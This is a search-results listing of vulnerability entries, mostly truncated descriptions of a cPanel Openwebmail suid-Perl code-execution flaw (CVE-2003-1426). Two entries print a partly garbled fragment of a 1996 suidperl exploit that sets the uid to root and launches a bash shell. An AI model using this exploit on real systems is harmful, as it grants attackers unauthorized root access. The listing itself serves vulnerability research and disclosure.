6 matches found
CVE-2003-1426
Openwebmail in cPanel 5.0, when run using suid Perl, adds the directory in the SCRIPTFILENAME environment variable to Perl's @INC include array, which allows local users to execute arbitrary code by modifying SCRIPTFILENAME to reference a directory containing a malicious openwebmail-shared.pl...
CVE-2003-1426
Openwebmail in cPanel 5.0 (when run with suid Perl) writes the SCRIPT_FILENAME directory into Perl's @INC, enabling local users to run arbitrary code by pointing SCRIPT_FILENAME to a directory containing a malicious openwebmail-shared.pl. This CVE (CVE-2003-1426) describes a local-privilege-vecto...
suid_perl 5.001 vulnerability
No description provided by source. !/usr/bin/suidperl -U $ENVPATH="/bin:/usr/bin"; $=0;$=0; exec"/bin/bash";...
CVE-2003-1426
Openwebmail in cPanel 5.0, when run using suid Perl, adds the directory in the SCRIPTFILENAME environment variable to Perl's @INC include array, which allows local users to execute arbitrary code by modifying SCRIPTFILENAME to reference a directory containing a malicious openwebmail-shared.pl...
re, suidperl; more
hi, yes, i hoped to announce this bug to the perl-developers before it came public; but i think they read BQ ... Michal ... : So far, there are more security-releated apps which use /bin/mail for logging Once I was also fallen into thinking that it can be secure, until Dave Dittrich pointed that ...
suid_perl 5.001 - Command Execution
!/usr/bin/suidperl -U $ENVPATH="/bin:/usr/bin"; $=0;$=0; exec"/bin/bash"; milw0rm.com 1996-06-01...